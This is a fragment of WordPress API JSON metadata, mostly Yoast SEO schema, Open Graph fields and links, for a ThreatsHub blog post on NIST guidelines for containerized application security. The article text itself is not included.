News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/nist-guidelines-for-containerized-application-security-threat-researcher\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/nist-guidelines-for-containerized-application-security-threat-researcher\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/08\\\/nist-guidelines-for-containerized-application-security-threat-researcher.png\",\"datePublished\":\"2021-06-24T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/nist-guidelines-for-containerized-application-security-threat-researcher\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/nist-guidelines-for-containerized-application-security-threat-researcher\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/nist-guidelines-for-containerized-application-security-threat-researcher\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/08\\\/nist-guidelines-for-containerized-application-security-threat-researcher.png\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/08\\\/nist-guidelines-for-containerized-application-security-threat-researcher.png\",\"width\":824,\"height\":320},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/nist-guidelines-for-containerized-application-security-threat-researcher\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro DevOps : Article\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-devops-article\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"NIST Guidelines for Containerized Application Security Threat Researcher\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"NIST Guidelines for Containerized Application Security Threat Researcher 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/nist-guidelines-for-containerized-application-security-threat-researcher\/","og_locale":"en_US","og_type":"article","og_title":"NIST Guidelines for Containerized Application Security Threat Researcher 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/nist-guidelines-for-containerized-application-security-threat-researcher\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2021-06-24T00:00:00+00:00","og_image":[{"width":824,"height":320,"url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/08\/nist-guidelines-for-containerized-application-security-threat-researcher.png","type":"image\/png"}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"17 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/nist-guidelines-for-containerized-application-security-threat-researcher\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/nist-guidelines-for-containerized-application-security-threat-researcher\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"NIST Guidelines for Containerized Application Security Threat Researcher","datePublished":"2021-06-24T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/nist-guidelines-for-containerized-application-security-threat-researcher\/"},"wordCount":3280,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/nist-guidelines-for-containerized-application-security-threat-researcher\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/08\/nist-guidelines-for-containerized-application-security-threat-researcher.png","keywords":["Trend Micro DevOps : Article","Trend Micro DevOps : Container Security","Trend Micro DevOps : How To","Trend Micro DevOps : Multi Cloud"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/nist-guidelines-for-containerized-application-security-threat-researcher\/","url":"https:\/\/www.threatshub.org\/blog\/nist-guidelines-for-containerized-application-security-threat-researcher\/","name":"NIST Guidelines for Containerized Application Security Threat Researcher 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/nist-guidelines-for-containerized-application-security-threat-researcher\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/nist-guidelines-for-containerized-application-security-threat-researcher\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/08\/nist-guidelines-for-containerized-application-security-threat-researcher.png","datePublished":"2021-06-24T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/nist-guidelines-for-containerized-application-security-threat-researcher\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/nist-guidelines-for-containerized-application-security-threat-researcher\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/nist-guidelines-for-containerized-application-security-threat-researcher\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/08\/nist-guidelines-for-containerized-application-security-threat-researcher.png","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/08\/nist-guidelines-for-containerized-application-security-threat-researcher.png","width":824,"height":320},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/nist-guidelines-for-containerized-application-security-threat-researcher\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro DevOps : Article","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-devops-article\/"},{"@type":"ListItem","position":3,"name":"NIST Guidelines for Containerized Application Security Threat Researcher"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/42336","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=42336"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/42336\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/42337"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=42336"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=42336"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=42336"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}